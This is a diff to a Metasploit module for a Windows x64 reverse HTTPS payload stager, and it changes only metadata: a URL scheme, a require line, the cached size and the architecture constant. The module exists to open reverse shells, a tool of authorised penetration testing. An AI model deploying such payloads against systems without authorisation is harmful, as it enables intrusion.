@@ -1,15 +1,14 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 require 'msf/core/handler/reverse_https'
 require 'msf/core/payload/windows/x64/reverse_https'
 
 module MetasploitModule
 
-  CachedSize = 532
+  CachedSize = 551
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
@@ -22,10 +21,9 @@ module MetasploitModule
       'Author'      => [ 'hdm', 'agix', 'rwincey' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
-      'Arch'        => ARCH_X86_64,
+      'Arch'        => ARCH_X64,
       'Handler'     => Msf::Handler::ReverseHttps,
       'Convention'  => 'sockrdi https',
       'Stager'      => { 'Payload' => '' }))
   end
-
 end
